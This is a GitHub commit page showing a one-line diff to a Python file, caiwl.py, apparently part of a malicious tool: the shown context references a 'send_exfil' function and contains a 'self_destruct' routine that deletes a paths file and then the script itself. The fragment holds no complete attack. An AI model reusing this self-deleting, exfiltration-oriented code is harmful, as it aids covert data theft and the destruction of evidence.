We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 15954bd commit 271f207Copy full SHA for 271f207
caiwl.py
@@ -49,7 +49,7 @@ def send_exfil(data):
49
#function to self destruct
50
def self_destruct():
51
try:
52
- os.remove("Paths.bat")
+ os.remove("Paths.txt")
53
except:
54
print("Paths file already gone")
55
remove(argv[0])
0 commit comments